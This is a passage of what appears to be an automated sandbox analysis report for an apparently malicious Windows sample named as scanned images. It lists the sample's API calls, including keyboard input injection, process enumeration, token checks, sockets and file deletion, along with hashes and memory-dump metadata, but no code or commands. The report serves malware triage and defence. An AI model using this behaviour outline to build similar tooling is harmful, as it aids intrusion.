                                                                                  • Part of subcall function 004B2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004B2DE4
                                                                                • GetFocus.USER32 ref: 004B2F78
                                                                                  • Part of subcall function 004B2DEE: GetParent.USER32(00000000), ref: 004B2DF9
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004B2FC3
                                                                                • EnumChildWindows.USER32(?,004B303B), ref: 004B2FEB
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                • String ID: %s%d
                                                                                • API String ID: 1272988791-1110647743
                                                                                • Opcode ID: e4f51d88b61ce3c93fbd669f20b36f717373a6482a58f367a081a039c17a28dd
                                                                                • Instruction ID: 89e7441748b1950336ce47d6e019df134cb00b731a5082e718c70f9d74a9cc9d
                                                                                • Opcode Fuzzy Hash: e4f51d88b61ce3c93fbd669f20b36f717373a6482a58f367a081a039c17a28dd
                                                                                • Instruction Fuzzy Hash: 1D11B7716002056BDF147F728CC5EEE376AAF94309F04407AFD099B253DE78594A8B74
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004E58C1
                                                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004E58EE
                                                                                • DrawMenuBar.USER32(?), ref: 004E58FD
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Menu$InfoItem$Draw
                                                                                • String ID: 0
                                                                                • API String ID: 3227129158-4108050209
                                                                                • Opcode ID: 65d3f4ffe0efb2a5e014f07114c8a734d4dce0a6e2655594a3174ab78354a6b2
                                                                                • Instruction ID: c5a0b70e32c13e64adb58e072dabd99691e898e8ae38c094a3bdf35c487bf04f
                                                                                • Opcode Fuzzy Hash: 65d3f4ffe0efb2a5e014f07114c8a734d4dce0a6e2655594a3174ab78354a6b2
                                                                                • Instruction Fuzzy Hash: 8001A171500258EFDB109F12DC84BEFBBB4FB45369F0080AAE848DA252DB348A85DF25
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 004AD3BF
                                                                                • FreeLibrary.KERNEL32 ref: 004AD3E5
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                                • API String ID: 3013587201-2590602151
                                                                                • Opcode ID: fa8d4e6e908b8d40ed6437898732dff4e8e5a1f8ad5fff5d8df2b470047aab5c
                                                                                • Instruction ID: ec9e00b7bca41079d5936d293f135289f3c8a3bce73338aa0b13a84080458f79
                                                                                • Opcode Fuzzy Hash: fa8d4e6e908b8d40ed6437898732dff4e8e5a1f8ad5fff5d8df2b470047aab5c
                                                                                • Instruction Fuzzy Hash: 84F02722C01A2187D72142105CD4B9A7220BF32701B548197E803E5609E71CCC46C6CF
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 69822b61fe5a4c332058f521aefe0a95c387b74d2f0858ddb121088c5075d2bb
                                                                                • Instruction ID: db4366a3721292a3dc09a66d3fb9b9faa28493bd8611348459f99037ebfe38f2
                                                                                • Opcode Fuzzy Hash: 69822b61fe5a4c332058f521aefe0a95c387b74d2f0858ddb121088c5075d2bb
                                                                                • Instruction Fuzzy Hash: C5C15D75A00206EFDB18CFA8C898AAFB7B5FF48305F108599E905EB251D735DD42CBA4
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Variant$ClearInitInitializeUninitialize
                                                                                • String ID:
                                                                                • API String ID: 1998397398-0
                                                                                • Opcode ID: c2d073fe95115abe4da673a65ef5e727f44be1f66aca3f4cfd58f5dbedab2156
                                                                                • Instruction ID: 0e02a377e836e953ef9fdf55e33a8384c10d9247218eeff7547be16bfd7c82c8
                                                                                • Opcode Fuzzy Hash: c2d073fe95115abe4da673a65ef5e727f44be1f66aca3f4cfd58f5dbedab2156
                                                                                • Instruction Fuzzy Hash: B5A15A75204200AFC710DF25C495A2AB7E5FF88759F04885EF98A9B362DB38ED05CB5A
                                                                                APIs
                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,004EFC08,?), ref: 004B05F0
                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,004EFC08,?), ref: 004B0608
                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,004ECC40,000000FF,?,00000000,00000800,00000000,?,004EFC08,?), ref: 004B062D
                                                                                • _memcmp.LIBVCRUNTIME ref: 004B064E
                                                                                Similarity
                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                • String ID:
                                                                                • API String ID: 314563124-0
                                                                                • Opcode ID: c4a1c36d0209b157820926256928213e5f392ef937c3786abd746dcde4ae2263
                                                                                • Instruction ID: fd97021d00e2fa7e763c0c8fa595ddcdb2c1be5d29e0e0358cc2e4858bf34c29
                                                                                • Opcode Fuzzy Hash: c4a1c36d0209b157820926256928213e5f392ef937c3786abd746dcde4ae2263
                                                                                • Instruction Fuzzy Hash: 0A810B71A00109EFCB04DF98C984EEFB7B9FF89316F204559E506AB250DB75AE06CB64
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 075eefe01ffac802ba4afe033aa4802d443d16629ed6776b4b546c2181a61e56
                                                                                • Instruction ID: 48452378026a5595d677acf3399e29e1fd44bd449a9ae078e2a7f34c3aedec28
                                                                                • Opcode Fuzzy Hash: 075eefe01ffac802ba4afe033aa4802d443d16629ed6776b4b546c2181a61e56
                                                                                • Instruction Fuzzy Hash: 8E415D316005026BDF257BBA8C45ABF3EA4EF45374F25467BF818D62E2E63C8841476A
                                                                                APIs
                                                                                • GetWindowRect.USER32(012A1190,?), ref: 004E62E2
                                                                                • ScreenToClient.USER32(?,?), ref: 004E6315
                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 004E6382
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                • String ID:
                                                                                • API String ID: 3880355969-0
                                                                                • Opcode ID: 0559e773343f1a471a435889fbff181453fe66c344511267ac58b587fc0252fa
                                                                                • Instruction ID: 38cdf049e784638b9de53d0c30d31f4d348d09d729f78f829ddecc98f3dbce5e
                                                                                • Opcode Fuzzy Hash: 0559e773343f1a471a435889fbff181453fe66c344511267ac58b587fc0252fa
                                                                                • Instruction Fuzzy Hash: FA516B70900289AFCB20DF69D8809AF7BB6EF653A1F11816AF9149B391D734AD81CB54
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 004D1AFD
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1B0B
                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004D1B8A
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1B94
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$socket
                                                                                • String ID:
                                                                                • API String ID: 1881357543-0
                                                                                • Opcode ID: 685e2af9d22751a59b6cb1c82661e5bdabd8d2a11deadbbbfc5912a24a2ad8ee
                                                                                • Instruction ID: 412f06c7d83aed2058937d59c423a1c3d1517743b77c7552dd66c29ca2fb8e65
                                                                                • Opcode Fuzzy Hash: 685e2af9d22751a59b6cb1c82661e5bdabd8d2a11deadbbbfc5912a24a2ad8ee
                                                                                • Instruction Fuzzy Hash: 6F41B134600200AFE720AF25C886F2677E5AB44718F54845EF91A9F3D3E77AED42CB95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ed258d06f50d9e07c15b1d437aeeccd1454d3325bca08c032cf8e5b517981985
                                                                                • Instruction ID: 00e38616e1adeec14fe624730151d43343bf5c7e19d56514125b9167d4ee6f65
                                                                                • Opcode Fuzzy Hash: ed258d06f50d9e07c15b1d437aeeccd1454d3325bca08c032cf8e5b517981985
                                                                                • Instruction Fuzzy Hash: 0041F871900604BFD724AF39C842B6EBBA9EB84B14F10892FF545DB292D379990187D4
                                                                                APIs
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004C5783
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 004C57A9
                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004C57CE
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004C57FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 3321077145-0
                                                                                • Opcode ID: 4ad0386d0e445e501f0b3f0be576009c1408e5d5341982b1f7a23b52cf9e823c
                                                                                • Instruction ID: e7bd91e719ee6d852d063227f20b00194c96e6d7e36dcd510b82fd574fbfaa82
                                                                                • Opcode Fuzzy Hash: 4ad0386d0e445e501f0b3f0be576009c1408e5d5341982b1f7a23b52cf9e823c
                                                                                • Instruction Fuzzy Hash: D6415E39600610DFCB10EF15C484A1EBBE1EF88329B18849DEC4A5B362DB38FD45CB95
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00476D71,00000000,00000000,004782D9,?,004782D9,?,00000001,00476D71,?,00000001,004782D9,004782D9), ref: 0048D910
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0048D999
                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0048D9AB
                                                                                • __freea.LIBCMT ref: 0048D9B4
                                                                                  • Part of subcall function 00483820: RtlAllocateHeap.NTDLL(00000000,?,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6,?,00451129), ref: 00483852
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                • String ID:
                                                                                • API String ID: 2652629310-0
                                                                                • Opcode ID: 2b7dd28b92642dae97648f86e97bcd1b6bf354a7b4fbbc464e2736eaa8b7a92d
                                                                                • Instruction ID: 12d8c6ada76d39fd9c4810e49d2a797e7f899510cc813abc5593ba42d710eb17
                                                                                • Opcode Fuzzy Hash: 2b7dd28b92642dae97648f86e97bcd1b6bf354a7b4fbbc464e2736eaa8b7a92d
                                                                                • Instruction Fuzzy Hash: 1631E0B2A0121AABDF24AF65DC81EAF7BA5EF40310F05456AFC08D6291E739CD51CB94
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004E5352
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E5375
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004E5382
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004E53A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$InvalidateMessageRectSend
                                                                                • String ID:
                                                                                • API String ID: 3340791633-0
                                                                                • Opcode ID: 8095d614f596a34306f5697a97d46140da2bd777fd1beab146560344df368a58
                                                                                • Instruction ID: 7c517c26676c22204f21b1d7a2c69bc2698b8159658f02caabddd51fa4201406
                                                                                • Opcode Fuzzy Hash: 8095d614f596a34306f5697a97d46140da2bd777fd1beab146560344df368a58
                                                                                • Instruction Fuzzy Hash: 0D310734A55A88EFEB309F16CC45BEA3761AB0539AF584103FE10963E1C3B89D41974A
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 004BABF1
                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 004BAC0D
                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 004BAC74
                                                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 004BACC6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 0c6142be0d503b4e9424dd4d35607ad1ebae04c1dab2cea42c4bd32da8ccdb1c
                                                                                • Instruction ID: c145cdc8335687f2bfc9744f0635399d3fe2056a0b7e0f747120402f50d767ba
                                                                                • Opcode Fuzzy Hash: 0c6142be0d503b4e9424dd4d35607ad1ebae04c1dab2cea42c4bd32da8ccdb1c
                                                                                • Instruction Fuzzy Hash: 39311630A002586FEF35CB6988497FB7FB5AB85310F04421BE481562D6D37C89A187BA
                                                                                APIs
                                                                                • ClientToScreen.USER32(?,?), ref: 004E769A
                                                                                • GetWindowRect.USER32(?,?), ref: 004E7710
                                                                                • PtInRect.USER32(?,?,004E8B89), ref: 004E7720
                                                                                • MessageBeep.USER32(00000000), ref: 004E778C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 1352109105-0
                                                                                • Opcode ID: cbf303a2bca483ee8ebe63f1f9292eb52de71c98929a5e59502cd51f2ac37d8c
                                                                                • Instruction ID: fc9e56addd63322b1f66ec3f5ae1c07b64b5d2097b1b62875c9e025b91dacf9a
                                                                                • Opcode Fuzzy Hash: cbf303a2bca483ee8ebe63f1f9292eb52de71c98929a5e59502cd51f2ac37d8c
                                                                                • Instruction Fuzzy Hash: 0D41B034A05294DFDB11CF5AC884EAA77F0FF59325F1440AAE4149B361C338B982CF94
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 004E16EB
                                                                                  • Part of subcall function 004B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004B3A57
                                                                                  • Part of subcall function 004B3A3D: GetCurrentThreadId.KERNEL32 ref: 004B3A5E
                                                                                  • Part of subcall function 004B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004B25B3), ref: 004B3A65
                                                                                • GetCaretPos.USER32(?), ref: 004E16FF
                                                                                • ClientToScreen.USER32(00000000,?), ref: 004E174C
                                                                                • GetForegroundWindow.USER32 ref: 004E1752
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                • String ID:
                                                                                • API String ID: 2759813231-0
                                                                                • Opcode ID: 00a5c1e5fc5110974ae8ebe3171db7b233985a4e499e35c1c7496475ed067437
                                                                                • Instruction ID: f093c4be3d833c80f355f368b3b02eec9ab300919d6fc813fcee77381ca7a653
                                                                                • Opcode Fuzzy Hash: 00a5c1e5fc5110974ae8ebe3171db7b233985a4e499e35c1c7496475ed067437
                                                                                • Instruction Fuzzy Hash: C5313075D00249AFC700EFAAC8C1CAEB7F9EF48308B5080AEE415E7252D7359E45CBA4
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 004BD501
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 004BD50F
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 004BD52F
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004BD5DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 420147892-0
                                                                                • Opcode ID: 1239b0787b76d3c439192ef949c1f08a98387241ff06ec2e8097c83a878ba507
                                                                                • Instruction ID: 93f92e1ae2a9eb982ea55e643881c02f52753d6682b951475fd64041aac6e0cd
                                                                                • Opcode Fuzzy Hash: 1239b0787b76d3c439192ef949c1f08a98387241ff06ec2e8097c83a878ba507
                                                                                • Instruction Fuzzy Hash: 3F31DB71108340AFD310EF54C881AAFBBF8EF95344F14096EF981871A2EB759949CBA7
                                                                                APIs
                                                                                  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
                                                                                • GetCursorPos.USER32(?), ref: 004E9001
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004A7711,?,?,?,?,?), ref: 004E9016
                                                                                • GetCursorPos.USER32(?), ref: 004E905E
                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004A7711,?,?,?), ref: 004E9094
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                • String ID:
                                                                                • API String ID: 2864067406-0
                                                                                • Opcode ID: 321a0618f43dc896e73cc8b3d625f2994805418aaf60174f94e314ccb26e766f
                                                                                • Instruction ID: e18bf523a6b58cfba39c1f37bd6a1aa66f4e46de80e70e305ca68edfa3f0b32f
                                                                                • Opcode Fuzzy Hash: 321a0618f43dc896e73cc8b3d625f2994805418aaf60174f94e314ccb26e766f
                                                                                • Instruction Fuzzy Hash: F921B171600158FFCB258F96C898EEB3BB9FF4A351F44406AF5054B2A1C3359E91DB64
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(?,004ECB68), ref: 004BD2FB
                                                                                • GetLastError.KERNEL32 ref: 004BD30A
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004BD319
                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,004ECB68), ref: 004BD376
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 2267087916-0
                                                                                • Opcode ID: 1226d4351b34626a0417617acca6c2100405d21f7a307a9d5b13df89fc1a8fda
                                                                                • Instruction ID: bc13bf1c82db40769c099e1086c7131a6c7f66aeaf6cf13a93a22d9ff15a1035
                                                                                • Opcode Fuzzy Hash: 1226d4351b34626a0417617acca6c2100405d21f7a307a9d5b13df89fc1a8fda
                                                                                • Instruction Fuzzy Hash: 432182709042019F8700DF25C8814AB77E4AF55359F105A5EF895C72A3E739994ACBAB
                                                                                APIs
                                                                                  • Part of subcall function 004B1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004B102A
                                                                                  • Part of subcall function 004B1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004B1036
                                                                                  • Part of subcall function 004B1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B1045
                                                                                  • Part of subcall function 004B1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004B104C
                                                                                  • Part of subcall function 004B1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B1062
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004B15BE
                                                                                • _memcmp.LIBVCRUNTIME ref: 004B15E1
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B1617
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B161E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
